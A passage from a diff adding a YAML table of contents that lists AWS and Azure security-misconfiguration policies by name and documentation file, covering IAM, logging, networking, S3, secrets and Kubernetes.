+  - name: AWS IAM password policy allows password reuse
+    file: iam-10.adoc
+  - name: AWS IAM password policy does not expire in 90 days
+    file: iam-11.adoc
+  - name: AWS IAM policy attached to users
+    file: iam-16-iam-policy-privileges-1.adoc
+  - name: AWS IAM policies that allow full administrative privileges are created
+    file: iam-23.adoc
+  - name: AWS IAM policy documents allow * (asterisk) as a statement's action
+    file: iam-48.adoc
+  - name: AWS IAM password policy does not have an uppercase character
+    file: iam-5.adoc
+  - name: AWS IAM password policy does not have a lowercase character
+    file: iam-6.adoc
+  - name: AWS IAM password policy does not have a symbol
+    file: iam-7.adoc
+  - name: AWS IAM password policy does not have a number
+    file: iam-8.adoc
+  - name: AWS IAM password policy does not have a minimum of 14 characters
+    file: iam-9-1.adoc
+- name: AWS Kubernetes Policies
+  dir: aws-kubernetes-policies
+  topics:
+  - name: AWS Kubernetes Policies
+    file: aws-kubernetes-policies.adoc
+  - name: AWS EKS cluster security group is overly permissive to all traffic
+    file: bc-aws-kubernetes-1.adoc
+  - name: AWS EKS cluster endpoint access publicly enabled
+    file: bc-aws-kubernetes-2.adoc
+  - name: AWS EKS cluster does not have secrets encryption enabled
+    file: bc-aws-kubernetes-3.adoc
+  - name: AWS EKS control plane logging disabled
+    file: bc-aws-kubernetes-4.adoc
+  - name: AWS EKS node group does not have implicit SSH access from 0.0.0.0/0
+    file: bc-aws-kubernetes-5.adoc
+- name: AWS Logging Policies
+  dir: aws-logging-policies
+  topics:
+  - name: AWS Logging Policies
+    file: aws-logging-policies.adoc
+  - name: Amazon MQ Broker logging is not enabled
+    file: bc-aws-logging-10.adoc
+  - name: AWS ECS cluster with container insights feature disabled
+    file: bc-aws-logging-11.adoc
+  - name: AWS Redshift database does not have audit logging enabled
+    file: bc-aws-logging-12.adoc
+  - name: AWS Elastic Load Balancer v2 (ELBv2) with access log disabled
+    file: bc-aws-logging-22.adoc
+  - name: AWS Elastic Load Balancer (Classic) with access log disabled
+    file: bc-aws-logging-23.adoc
+  - name: Neptune logging is not enabled
+    file: bc-aws-logging-24.adoc
+  - name: AWS WAF Web Access Control Lists logging is disabled
+    file: bc-aws-logging-31.adoc
+  - name: AWS WAF2 does not have a Logging Configuration
+    file: bc-aws-logging-33.adoc
+  - name: API Gateway stage does not have logging level defined appropriately
+    file: ensure-api-gateway-stage-have-logging-level-defined-as-appropiate.adoc
+  - name: CloudTrail trail is not integrated with CloudWatch Logs
+    file: ensure-cloudtrail-trails-are-integrated-with-cloudwatch-logs.adoc
+  - name: AWS Postgres RDS has Query Logging disabled
+    file: ensure-postgres-rds-as-aws-db-instance-has-query-logging-enabled.adoc
+  - name: AWS CloudFormation stack configured without SNS topic
+    file: ensure-that-cloudformation-stacks-are-sending-event-notifications-to-an-sns-topic.adoc
+  - name: AWS EC2 instance detailed monitoring disabled
+    file: ensure-that-detailed-monitoring-is-enabled-for-ec2-instances.adoc
+  - name: AWS Amazon RDS instances Enhanced Monitoring is disabled
+    file: ensure-that-enhanced-monitoring-is-enabled-for-amazon-rds-instances.adoc
+  - name: AWS CloudTrail is not enabled with multi trail and not capturing all management events
+    file: logging-1.adoc
+  - name: AWS CloudWatch Log groups not configured with definite retention days
+    file: logging-13.adoc
+  - name: API Gateway does not have X-Ray tracing enabled
+    file: logging-15.adoc
+  - name: Global Accelerator does not have Flow logs enabled
+    file: logging-16.adoc
+  - name: API Gateway does not have access logging enabled
+    file: logging-17.adoc
+  - name: Amazon MSK cluster logging is not enabled
+    file: logging-18.adoc
+  - name: AWS DocumentDB logging is not enabled
+    file: logging-19.adoc
+  - name: AWS CloudTrail log validation is not enabled in all regions
+    file: logging-2.adoc
+  - name: AWS CloudFront distribution with access logging disabled
+    file: logging-20.adoc
+  - name: AWS Config is not enabled in all regions
+    file: logging-5-enable-aws-config-regions.adoc
+  - name: AWS CloudTrail logs are not encrypted using Customer Master Keys (CMKs)
+    file: logging-7.adoc
+  - name: AWS Customer Master Key (CMK) rotation is not enabled
+    file: logging-8.adoc
+  - name: AWS VPC Flow Logs not enabled
+    file: logging-9-enable-vpc-flow-logging.adoc
+- name: AWS Networking Policies
+  dir: aws-networking-policies
+  topics:
+  - name: AWS Networking Policies
+    file: aws-networking-policies.adoc
+  - name: DocDB TLS is disabled
+    file: bc-aws-networking-37.adoc
+  - name: AWS CloudFront web distribution using insecure TLS version
+    file: bc-aws-networking-63.adoc
+  - name: AWS WAF does not have associated rules
+    file: bc-aws-networking-64.adoc
+  - name: AWS CloudFront distribution does not have a strict security headers policy attached
+    file: bc-aws-networking-65.adoc
+  - name: AWS ACM certificate does not enable Create before Destroy
+    file: ensure-aws-acm-certificate-enables-create-before-destroy.adoc
+  - name: AWS CloudFront web distribution with default SSL certificate
+    file: ensure-aws-cloudfront-distribution-uses-custom-ssl-certificate.adoc
+  - name: AWS Database Migration Service endpoints do not have SSL configured
+    file: ensure-aws-database-migration-service-endpoints-have-ssl-configured.adoc
+  - name: AWS Elasticache security groups are not defined
+    file: ensure-aws-elasticache-security-groups-are-defined.adoc
+  - name: AWS Elasticsearch uses the default security group
+    file: ensure-aws-elasticsearch-does-not-use-the-default-security-group.adoc
+  - name: AWS ELB Policy uses some insecure protocols
+    file: ensure-aws-elb-policy-uses-only-secure-protocols.adoc
+  - name: AWS NACL allows ingress from 0.0.0.0/0 to port 20
+    file: ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-20.adoc
+  - name: AWS NACL allows ingress from 0.0.0.0/0 to port 21
+    file: ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-21.adoc
+  - name: AWS NACL allows ingress from 0.0.0.0/0 to port 22
+    file: ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-22.adoc
+  - name: AWS NACL allows ingress from 0.0.0.0/0 to port 3389
+    file: ensure-aws-nacl-does-not-allow-ingress-from-00000-to-port-3389.adoc
+  - name: AWS NAT Gateways are not utilized for the default route
+    file: ensure-aws-nat-gateways-are-utilized-for-the-default-route.adoc
+  - name: AWS RDS security groups are not defined
+    file: ensure-aws-rds-security-groups-are-defined.adoc
+  - name: AWS route table with VPC peering overly permissive to all traffic
+    file: ensure-aws-route-table-with-vpc-peering-does-not-contain-routes-overly-permissive-to-all-traffic.adoc
+  - name: AWS Security Group allows all traffic on all ports
+    file: ensure-aws-security-group-does-not-allow-all-traffic-on-all-ports.adoc
+  - name: AWS security groups allow ingress from 0.0.0.0/0 to port 80
+    file: ensure-aws-security-groups-do-not-allow-ingress-from-00000-to-port-80.adoc
+  - name: Default VPC is planned to be provisioned
+    file: ensure-no-default-vpc-is-planned-to-be-provisioned.adoc
+  - name: Public API gateway not configured with AWS Web Application Firewall v2 (AWS WAFv2)
+    file: ensure-public-api-gateway-are-protected-by-waf.adoc
+  - name: AWS Application Load Balancer (ALB) not configured with AWS Web Application Firewall v2 (AWS WAFv2)
+    file: ensure-public-facing-alb-are-protected-by-waf.adoc
+  - name: Redshift is deployed outside of a VPC
+    file: ensure-redshift-is-not-deployed-outside-of-a-vpc.adoc
+  - name: ALB does not drop HTTP headers
+    file: ensure-that-alb-drops-http-headers.adoc
+  - name: ALB does not redirect HTTP requests into HTTPS ones
+    file: ensure-that-alb-redirects-http-requests-into-https-ones.adoc
+  - name: Not all EIP addresses allocated to a VPC are attached to EC2 instances
+    file: ensure-that-all-eip-addresses-allocated-to-a-vpc-are-attached-to-ec2-instances.adoc
+  - name: Not all NACL are attached to subnets
+    file: ensure-that-all-nacl-are-attached-to-subnets.adoc
+  - name: Amazon EMR clusters' security groups are open to the world
+    file: ensure-that-amazon-emr-clusters-security-groups-are-not-open-to-the-world.adoc
+  - name: AWS Redshift cluster is publicly accessible
+    file: ensure-that-amazon-redshift-clusters-are-not-publicly-accessible.adoc
+  - name: Auto scaling groups associated with a load balancer do not use elastic load balancing health checks
+    file: ensure-that-auto-scaling-groups-that-are-associated-with-a-load-balancer-are-using-elastic-load-balancing-health-checks.adoc
+  - name: AWS SageMaker notebook instance configured with direct internet access feature
+    file: ensure-that-direct-internet-access-is-disabled-for-an-amazon-sagemaker-notebook-instance.adoc
+  - name: AWS Elasticsearch is not configured inside a VPC
+    file: ensure-that-elasticsearch-is-configured-inside-a-vpc.adoc
+  - name: AWS Elastic Load Balancer (Classic) with cross-zone load balancing disabled
+    file: ensure-that-elb-is-cross-zone-load-balancing-enabled.adoc
+  - name: Load Balancer (Network/Gateway) does not have cross-zone load balancing enabled
+    file: ensure-that-load-balancer-networkgateway-has-cross-zone-load-balancing-enabled.adoc
+  - name: Security Groups are not attached to EC2 instances or ENIs
+    file: ensure-that-security-groups-are-attached-to-ec2-instances-or-elastic-network-interfaces-enis.adoc
+  - name: VPC endpoint service is not configured for manual acceptance
+    file: ensure-that-vpc-endpoint-service-is-configured-for-manual-acceptance.adoc
+  - name: Transfer Server is exposed publicly
+    file: ensure-transfer-server-is-not-exposed-publicly.adoc
+  - name: AWS VPC subnets should not allow automatic public IP assignment
+    file: ensure-vpc-subnets-do-not-assign-public-ip-by-default.adoc
+  - name: WAF enables message lookup in Log4j2
+    file: ensure-waf-prevents-message-lookup-in-log4j2.adoc
+  - name: AWS Security Group allows all traffic on SSH port (22)
+    file: networking-1-port-security.adoc
+  - name: AWS Security Group allows all traffic on RDP port (3389)
+    file: networking-2.adoc
+  - name: AWS Elastic Load Balancer v2 (ELBv2) listeners that allow connection requests over HTTP
+    file: networking-29.adoc
+  - name: Not every Security Group rule has a description
+    file: networking-31.adoc
+  - name: Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS
+    file: networking-32.adoc
+  - name: AWS Default Security Group does not restrict all traffic
+    file: networking-4.adoc
+  - name: S3 Bucket does not have public access blocks
+    file: s3-bucket-should-have-public-access-blocks-defaults-to-false-if-the-public-access-block-is-not-attached.adoc
+- name: Public Policies
+  dir: public-policies
+  topics:
+  - name: Public Policies
+    file: public-policies.adoc
+  - name: AWS Private ECR repository policy is overly permissive
+    file: public-1-ecr-repositories-not-public.adoc
+  - name: AWS MQ is publicly accessible
+    file: public-11.adoc
+  - name: AWS EC2 instances with public IP and associated with security groups have Internet access
+    file: public-12.adoc
+  - name: DMS replication instance is publicly accessible
+    file: public-13.adoc
+  - name: AWS RDS database instance is publicly accessible
+    file: public-2.adoc
+  - name: AWS API gateway methods are publicly accessible
+    file: public-6-api-gateway-authorizer-set.adoc
+  - name: AWS Redshift clusters should not be publicly accessible
+    file: public-9.adoc
+- name: S3 Policies
+  dir: s3-policies
+  topics:
+  - name: S3 Policies
+    file: s3-policies.adoc
+  - name: AWS S3 Buckets have block public access setting disabled
+    file: bc-aws-s3-19.adoc
+  - name: AWS S3 Bucket BlockPublicPolicy is not set to True
+    file: bc-aws-s3-20.adoc
+  - name: AWS S3 bucket IgnorePublicAcls is not set to True
+    file: bc-aws-s3-21.adoc
+  - name: AWS S3 bucket RestrictPublicBucket is not set to True
+    file: bc-aws-s3-22.adoc
+  - name: AWS S3 bucket policy overly permissive to any principal
+    file: bc-aws-s3-23.adoc
+  - name: AWS S3 bucket is not configured with MFA Delete
+    file: bc-aws-s3-24.adoc
+  - name: AWS S3 bucket ACL grants READ permission to everyone
+    file: s3-1-acl-read-permissions-everyone.adoc
+  - name: AWS Access logging not enabled on S3 buckets
+    file: s3-13-enable-logging.adoc
+  - name: AWS S3 buckets do not have server side encryption
+    file: s3-14-data-encrypted-at-rest.adoc
+  - name: AWS S3 Object Versioning is disabled
+    file: s3-16-enable-versioning.adoc
+  - name: AWS S3 Bucket has an ACL defined which allows public WRITE access
+    file: s3-2-acl-write-permissions-everyone.adoc
+- name: Secrets Policies
+  dir: secrets-policies
+  topics:
+  - name: Secrets Policies
+    file: secrets-policies.adoc
+  - name: EC2 user data exposes secrets
+    file: bc-aws-secrets-1.adoc
+  - name: Lambda function's environment variables expose secrets
+    file: bc-aws-secrets-3.adoc
+  - name: AWS access keys and secrets are hard coded in infrastructure
+    file: bc-aws-secrets-5.adoc
+- name: AWS Serverless Policies
+  dir: aws-serverless-policies
+  topics:
+  - name: AWS Serverless Policies
+    file: aws-serverless-policies.adoc
+  - name: AWS Lambda functions with tracing not enabled
+    file: bc-aws-serverless-4.adoc
+  - name: AWS Lambda encryption settings environmental variable is not set properly
+    file: bc-aws-serverless-5.adoc
+---
+kind: chapter
+name: Azure Policies
+dir: azure-policies
+topics:
+- name: Azure Policies
+  file: azure-policies.adoc
+- name: Azure General Policies
+  dir: azure-general-policies
+  topics:
+  - name: Azure General Policies
+    file: azure-general-policies.adoc
+  - name: Azure VM data disk is not encrypted with ADE/CMK
+    file: bc-azr-general-1.adoc
+  - name: Azure Linux scale set does not use an SSH key
+    file: bc-azr-general-13.adoc
+  - name: Virtual Machine extensions are installed
+    file: bc-azr-general-14.adoc
+  - name: Azure App Service Web app authentication is off
+    file: bc-azr-general-2.adoc
+  - name: Azure Microsoft Defender for Cloud security contact phone number is not set
+    file: bc-azr-general-3.adoc
+  - name: Azure Microsoft Defender for Cloud email notification for subscription owner is not set
+    file: bc-azr-general-5.adoc
+  - name: Azure SQL Server threat detection alerts are not enabled for all threat types
+    file: bc-azr-general-6.adoc
+  - name: Azure SQL server send alerts to field value is not set
+    file: bc-azr-general-7.adoc
+  - name: Azure SQL Databases with disabled Email service and co-administrators for Threat Detection
+    file: bc-azr-general-8.adoc
+  - name: Azure PostgreSQL Database Server 'Allow access to Azure services' enabled
+    file: ensure-allow-access-to-azure-services-for-postgresql-database-server-is-disabled.adoc
+  - name: Azure Built-in logging for Azure function app is disabled
+    file: ensure-azure-built-in-logging-for-azure-function-app-is-enabled.adoc
+  - name: Azure Client Certificates are not enforced for API management
+    file: ensure-azure-client-certificates-are-enforced-for-api-management.adoc
+  - name: Azure Cognitive Services does not use Customer Managed Keys (CMKs) for encryption
+    file: ensure-azure-cognitive-services-enables-customer-managed-keys-cmks-for-encryption.adoc
+  - name: Azure Data exfiltration protection for Azure Synapse workspace is disabled
+    file: ensure-azure-data-exfiltration-protection-for-azure-synapse-workspace-is-enabled.adoc
+  - name: Azure Machine Learning Compute Cluster Minimum Nodes is not set to 0
+    file: ensure-azure-machine-learning-compute-cluster-minimum-nodes-is-set-to-0.adoc
+  - name: Azure PostgreSQL Flexible Server does not enable geo-redundant backups
+    file: ensure-azure-postgresql-flexible-server-enables-geo-redundant-backups.adoc
+  - name: Azure resources that support tags do not have tags
+    file: ensure-azure-resources-that-support-tags-have-tags.adoc
+  - name: Azure SQL Server does not have default auditing policy configured
+    file: ensure-azure-sql-server-has-default-auditing-policy-configured.adoc
+  - name: Azure Virtual machine enables password authentication
+    file: ensure-azure-virtual-machine-does-not-enable-password-authentication.adoc
+  - name: Storage Account name does not follow naming rules
+    file: ensure-cognitive-services-account-encryption-cmks-are-enabled.adoc
+  - name: Azure App Services FTP deployment is All allowed
+    file: ensure-ftp-deployments-are-disabled.adoc
+  - name: MSSQL is not using the latest version of TLS encryption
+    file: ensure-mssql-is-using-the-latest-version-of-tls-encryption.adoc
+  - name: MySQL is not using the latest version of TLS encryption
+    file: ensure-mysql-is-using-the-latest-version-of-tls-encryption.adoc
+  - name: Azure Microsoft Defender for Cloud Defender plans is set to Off
+    file:
ensure-standard-pricing-tier-is-selected.adoc + - name: Storage for critical data are not encrypted with Customer Managed Key + file: ensure-storage-for-critical-data-are-encrypted-with-customer-managed-key.adoc + - name: Active Directory is not used for authentication for Service Fabric + file: ensure-that-active-directory-is-used-for-service-fabric-authentication.adoc + - name: App services do not use Azure files + file: ensure-that-app-services-use-azure-files.adoc + - name: Automatic OS image patching is disabled for Virtual Machine scale sets + file: ensure-that-automatic-os-image-patching-is-enabled-for-virtual-machine-scale-sets.adoc + - name: Azure Automation account variables are not encrypted + file: ensure-that-automation-account-variables-are-encrypted.adoc + - name: Azure SQL servers which doesn't have Azure Active Directory admin configured + file: ensure-that-azure-active-directory-admin-is-configured.adoc + - name: Azure Batch account does not use key vault to encrypt data + file: ensure-that-azure-batch-account-uses-key-vault-to-encrypt-data.adoc + - name: Azure Data Explorer encryption at rest does not use a customer-managed key + file: ensure-that-azure-data-explorer-encryption-at-rest-uses-a-customer-managed-key.adoc + - name: Azure Data Explorer does not use disk encryption + file: ensure-that-azure-data-explorer-uses-disk-encryption.adoc + - name: Azure Data Explorer does not use double encryption + file: ensure-that-azure-data-explorer-uses-double-encryption.adoc + - name: Azure data factories are not encrypted with a customer-managed key + file: ensure-that-azure-data-factories-are-encrypted-with-a-customer-managed-key.adoc + - name: Azure Data Factory does not use Git repository for source control + file: ensure-that-azure-data-factory-uses-git-repository-for-source-control.adoc + - name: Azure Microsoft Defender for Cloud is set to Off for App Service + file: ensure-that-azure-defender-is-set-to-on-for-app-service.adoc + - name: Azure 
Microsoft Defender for Cloud is set to Off for Azure SQL Databases + file: ensure-that-azure-defender-is-set-to-on-for-azure-sql-database-servers.adoc + - name: Azure Microsoft Defender for Cloud is set to Off for Container Registries + file: ensure-that-azure-defender-is-set-to-on-for-container-registries.adoc + - name: Azure Microsoft Defender for Cloud is set to Off for Key Vault + file: ensure-that-azure-defender-is-set-to-on-for-key-vault.adoc + - name: Azure Security Center Defender set to Off for Kubernetes + file: ensure-that-azure-defender-is-set-to-on-for-kubernetes.adoc + - name: Azure Microsoft Defender for Cloud is set to Off for Servers + file: ensure-that-azure-defender-is-set-to-on-for-servers.adoc + - name: Azure Microsoft Defender for Cloud is set to Off for SQL servers on machines + file: ensure-that-azure-defender-is-set-to-on-for-sql-servers-on-machines.adoc + - name: Azure Microsoft Defender for Cloud is set to Off for Storage + file: ensure-that-azure-defender-is-set-to-on-for-storage.adoc + - name: CORS allows resource to access app services + file: ensure-that-cors-disallows-every-resource-to-access-app-services.adoc + - name: CORS allows resources to access function apps + file: ensure-that-cors-disallows-every-resource-to-access-function-apps.adoc + - name: Cosmos DB Accounts do not have CMKs encrypting data at rest + file: ensure-that-cosmos-db-accounts-have-customer-managed-keys-to-encrypt-data-at-rest.adoc + - name: Unencrypted Data Lake Store accounts + file: ensure-that-data-lake-store-accounts-enables-encryption.adoc + - name: Azure Function App authentication is off + file: ensure-that-function-apps-enables-authentication.adoc + - name: Azure Function App doesn't use HTTP 2.0 + file: ensure-that-http-version-is-the-latest-if-used-to-run-the-function-app.adoc + - name: Azure App Service Web app does not use latest Java version + file: ensure-that-java-version-is-the-latest-if-used-to-run-the-web-app.adoc + - name: Azure Key Vault 
Purge protection is not enabled + file: ensure-that-key-vault-enables-purge-protection.adoc + - name: Key vault does not enable soft-delete + file: ensure-that-key-vault-enables-soft-delete.adoc + - name: Key vault key is not backed by HSM + file: ensure-that-key-vault-key-is-backed-by-hsm.adoc + - name: Key vault secrets do not have content_type set + file: ensure-that-key-vault-secrets-have-content-type-set.adoc + - name: Managed disks do not use a specific set of disk encryption sets for customer-managed key encryption + file: ensure-that-managed-disks-use-a-specific-set-of-disk-encryption-sets-for-the-customer-managed-key-encryption.adoc + - name: Azure App Service Web app does not have a Managed Service Identity + file: ensure-that-managed-identity-provider-is-enabled-for-app-services.adoc + - name: MariaDB server does not enable geo-redundant backups + file: ensure-that-mariadb-server-enables-geo-redundant-backups.adoc + - name: Microsoft Antimalware is not configured to automatically update Virtual Machines + file: ensure-that-microsoft-antimalware-is-configured-to-automatically-updates-for-virtual-machines.adoc + - name: My SQL server disables geo-redundant backups + file: ensure-that-my-sql-server-enables-geo-redundant-backups.adoc + - name: My SQL server does not enable Threat Detection policy + file: ensure-that-my-sql-server-enables-threat-detection-policy.adoc + - name: MySQL server does not enable customer-managed key for encryption + file: ensure-that-mysql-server-enables-customer-managed-key-for-encryption.adoc + - name: Azure App Service Web app doesn't use latest .Net framework version + file: ensure-that-net-framework-version-is-the-latest-if-used-as-a-part-of-the-web-app.adoc + - name: Azure App Service Web app does not use latest PHP version + file: ensure-that-php-version-is-the-latest-if-used-to-run-the-web-app.adoc + - name: PostgreSQL server does not enable customer-managed key for encryption + file: 
ensure-that-postgresql-server-enables-customer-managed-key-for-encryption.adoc + - name: PostgreSQL server enables geo-redundant backups + file: ensure-that-postgresql-server-enables-geo-redundant-backups.adoc + - name: MySQL server disables infrastructure encryption + file: ensure-that-postgresql-server-enables-infrastructure-encryption-1.adoc + - name: PostgreSQL server does not enable infrastructure encryption + file: ensure-that-postgresql-server-enables-infrastructure-encryption.adoc + - name: PostgreSQL server does not enable Threat Detection policy + file: ensure-that-postgresql-server-enables-threat-detection-policy.adoc + - name: Azure App Service Web app does not use latest Python version + file: ensure-that-python-version-is-the-latest-if-used-to-run-the-web-app.adoc + - name: Azure App Services Remote debugging is enabled + file: ensure-that-remote-debugging-is-not-enabled-for-app-services.adoc + - name: Azure Microsoft Defender for Cloud security alert email notifications is not set + file: ensure-that-security-contact-emails-is-set.adoc + - name: Service Fabric does not use three levels of protection available + file: ensure-that-service-fabric-uses-available-three-levels-of-protection-available.adoc + - name: Azure SQL server Defender setting is set to Off + file: ensure-that-sql-servers-enables-data-security-policy.adoc + - name: Azure Storage account Encryption CMKs Disabled + file: ensure-that-storage-accounts-use-customer-managed-key-for-encryption.adoc + - name: Unattached disks are not encrypted + file: ensure-that-unattached-disks-are-encrypted.adoc + - name: Azure SQL Server ADS Vulnerability Assessment (VA) 'Also send email notifications to admins and subscription owners' is disabled + file: ensure-that-va-setting-also-send-email-notifications-to-admins-and-subscription-owners-is-set-for-an-sql-server.adoc + - name: Azure SQL Server ADS Vulnerability Assessment (VA) Periodic recurring scans is disabled + file: 
ensure-that-va-setting-periodic-recurring-scans-is-enabled-on-a-sql-server.adoc + - name: Azure SQL Server ADS Vulnerability Assessment (VA) 'Send scan reports to' is not configured + file: ensure-that-va-setting-send-scan-reports-to-is-configured-for-a-sql-server.adoc + - name: Virtual machine scale sets do not have encryption at host enabled + file: ensure-that-virtual-machine-scale-sets-have-encryption-at-host-enabled.adoc + - name: Virtual Machines are not backed up using Azure Backup + file: ensure-that-virtual-machines-are-backed-up-using-azure-backup.adoc + - name: Azure Linux and Windows Virtual Machines does not utilize Managed Disks + file: ensure-that-virtual-machines-use-managed-disks.adoc + - name: Azure SQL Server ADS Vulnerability Assessment (VA) is disabled + file: ensure-that-vulnerability-assessment-va-is-enabled-on-a-sql-server-by-setting-a-storage-account.adoc + - name: Azure Key Vault is not recoverable + file: ensure-the-key-vault-is-recoverable.adoc + - name: Azure Virtual Machines does not utilise Managed Disks + file: ensure-virtual-machines-are-utilizing-managed-disks.adoc + - name: Azure Key Vault Keys does not have expiration date + file: set-an-expiration-date-on-all-keys.adoc +- name: Azure IAM Policies + dir: azure-iam-policies + topics: + - name: Azure IAM Policies + file: azure-iam-policies.adoc + - name: App Service is not registered with an Azure Active Directory account + file: bc-azr-iam-1.adoc + - name: Azure subscriptions with custom roles does not have minimum permissions + file: do-not-create-custom-subscription-owner-roles.adoc + - name: Azure CosmosDB does not have Local Authentication disabled + file: ensure-azure-acr-admin-account-is-disabled.adoc + - name: Azure ACR enables anonymous image pulling + file: ensure-azure-acr-disables-anonymous-image-pulling.adoc + - name: Azure CosmosDB does not have Local Authentication disabled + file: ensure-azure-cosmosdb-has-local-authentication-disabled.adoc + - name: Azure 
Kubernetes Service (AKS) local admin account is enabled + file: ensure-azure-kubernetes-service-aks-local-admin-account-is-disabled.adoc + - name: Azure Machine Learning Compute Cluster Local Authentication is enabled + file: ensure-azure-machine-learning-compute-cluster-local-authentication-is-disabled.adoc + - name: Azure Windows VM does not enable encryption + file: ensure-azure-windows-vm-enables-encryption.adoc +- name: Azure Kubernetes Policies + dir: azure-kubernetes-policies + topics: + - name: Azure Kubernetes Policies + file: azure-kubernetes-policies.adoc + - name: Azure AKS cluster monitoring not enabled + file: bc-azr-kubernetes-1.adoc + - name: Azure AKS enable role-based access control (RBAC) not enforced + file: bc-azr-kubernetes-2.adoc + - name: AKS API server does not define authorized IP ranges + file: bc-azr-kubernetes-3.adoc + - name: Azure AKS cluster network policies are not enforced + file: bc-azr-kubernetes-4.adoc + - name: Kubernetes dashboard is not disabled + file: bc-azr-kubernetes-5.adoc + - name: AKS is not enabled for private clusters + file: ensure-that-aks-enables-private-clusters.adoc + - name: AKS does not use Azure policies add-on + file: ensure-that-aks-uses-azure-policies-add-on.adoc + - name: AKS does not use disk encryption set + file: ensure-that-aks-uses-disk-encryption-set.adoc +- name: Azure Logging Policies + dir: azure-logging-policies + topics: + - name: Azure Logging Policies + file: azure-logging-policies.adoc + - name: Azure Network Watcher Network Security Group (NSG) flow logs retention is less than 90 days + file: bc-azr-logging-1.adoc + - name: Azure SQL Server auditing policy is disabled + file: bc-azr-logging-2.adoc + - name: Azure SQL Server audit log retention is not greater than 90 days + file: bc-azr-logging-3.adoc + - name: Azure storage account logging for queues is disabled + file: enable-requests-on-storage-logging-for-queue-service.adoc + - name: Azure Monitor log profile does not capture all 
activities + file: ensure-audit-profile-captures-all-activities.adoc + - name: Azure storage account logging setting for blobs is disabled + file: ensure-storage-logging-is-enabled-for-blob-service-for-read-requests.adoc + - name: Azure storage account logging setting for tables is disabled + file: ensure-storage-logging-is-enabled-for-table-service-for-read-requests.adoc + - name: App service does not enable failed request tracing + file: ensure-that-app-service-enables-failed-request-tracing.adoc + - name: App service does not enable HTTP logging + file: ensure-that-app-service-enables-http-logging.adoc + - name: Azure Storage account container storing activity logs is publicly accessible + file: ensure-the-storage-container-storing-the-activity-logs-is-not-publicly-accessible.adoc + - name: Activity Log Retention should not be set to less than 365 days + file: set-activity-log-retention-to-365-days-or-greater.adoc + - name: App service disables detailed error messages + file: tbdensure-that-app-service-enables-detailed-error-messages.adoc +- name: Azure Networking Policies + dir: azure-networking-policies + topics: + - name: Azure Networking Policies + file: azure-networking-policies.adoc + - name: Azure instance does not authenticate using SSH keys + file: bc-azr-networking-1.adoc + - name: Azure PostgreSQL database server with SSL connection disabled + file: bc-azr-networking-10.adoc + - name: Azure PostgreSQL database server with log checkpoints parameter disabled + file: bc-azr-networking-11.adoc + - name: Azure PostgreSQL database server with log connections parameter disabled + file: bc-azr-networking-12.adoc + - name: Azure PostgreSQL database server with connection throttling parameter is disabled + file: bc-azr-networking-13.adoc + - name: Azure MariaDB database server with SSL connection disabled + file: bc-azr-networking-17.adoc + - name: Azure RDP Internet access is not restricted + file: bc-azr-networking-2.adoc + - name: Azure Network Security 
Group allows all traffic on SSH (port 22) + file: bc-azr-networking-3.adoc + - name: Azure SQL Servers Firewall rule allow ingress access from 0.0.0.0/0 + file: bc-azr-networking-4.adoc + - name: Azure App Service Web app doesn't redirect HTTP to HTTPS + file: bc-azr-networking-5.adoc + - name: Azure App Service Web app doesn't use latest TLS version + file: bc-azr-networking-6.adoc + - name: Azure App Service Web app client certificate is disabled + file: bc-azr-networking-7.adoc + - name: Azure App Service Web app doesn't use HTTP 2.0 + file: bc-azr-networking-8.adoc + - name: Azure MySQL Database Server SSL connection is disabled + file: bc-azr-networking-9.adoc + - name: Azure Storage Account 'Trusted Microsoft Services' access not enabled + file: enable-trusted-microsoft-services-for-storage-account-access.adoc + - name: Azure Application Gateway Web application firewall (WAF) policy rule for Remote Command Execution is disabled + file: ensure-application-gateway-waf-prevents-message-lookup-in-log4j2.adoc + - name: Azure Container registries Public access to All networks is enabled + file: ensure-azure-acr-is-set-to-disable-public-networking.adoc + - name: Azure Redis Cache does not use the latest version of TLS encryption + file: ensure-azure-aks-cluster-nodes-do-not-have-public-ip-addresses.adoc + - name: Azure App service slot does not have debugging disabled + file: ensure-azure-app-service-slot-has-debugging-disabled.adoc + - name: Azure App's service slot does not use the latest version of TLS encryption + file: ensure-azure-apps-service-slot-uses-the-latest-version-of-tls-encryption.adoc + - name: Azure Cognitive Services accounts enable public network access + file: ensure-azure-cognitive-services-accounts-disable-public-network-access.adoc + - name: Azure Databricks workspace is public + file: ensure-azure-databricks-workspace-is-not-public.adoc + - name: Azure Function app does not use the latest version of TLS encryption + file: 
ensure-azure-function-app-uses-the-latest-version-of-tls-encryption.adoc + - name: Azure HTTP (port 80) access from the internet is not restricted + file: ensure-azure-http-port-80-access-from-the-internet-is-restricted.adoc + - name: Azure Machine Learning Workspace is publicly accessible + file: ensure-azure-machine-learning-workspace-is-not-publicly-accessible.adoc + - name: Azure PostgreSQL does not use the latest version of TLS encryption + file: ensure-azure-postgresql-uses-the-latest-version-of-tls-encryption.adoc + - name: Azure Redis Cache does not use the latest version of TLS encryption + file: ensure-azure-redis-cache-uses-the-latest-version-of-tls-encryption.adoc + - name: Azure Spring Cloud API Portal is not enabled for HTTPS + file: ensure-azure-spring-cloud-api-portal-is-enabled-for-https.adoc + - name: Azure Spring Cloud API Portal Public Access Is Enabled + file: ensure-azure-spring-cloud-api-portal-public-access-is-disabled.adoc + - name: Azure web app does not redirect all HTTP traffic to HTTPS in Azure App Service Slot + file: ensure-azure-web-app-redirects-all-http-traffic-to-https-in-azure-app-service-slot.adoc + - name: Cosmos DB accounts do not have restricted access + file: ensure-cosmos-db-accounts-have-restricted-access.adoc + - name: Azure Front Door Web application firewall (WAF) policy rule for Remote Command Execution is disabled + file: ensure-front-door-waf-prevents-message-lookup-in-log4j2.adoc + - name: public network access enabled' is not set to 'False' for mySQL servers + file: ensure-public-network-access-enabled-is-set-to-false-for-mysql-servers.adoc + - name: API management services do not use virtual networks + file: ensure-that-api-management-services-uses-virtual-networks.adoc + - name: Azure application gateway does not have WAF enabled + file: ensure-that-application-gateway-enables-waf.adoc + - name: Application gateway does not use WAF in Detection or Prevention modes + file: 
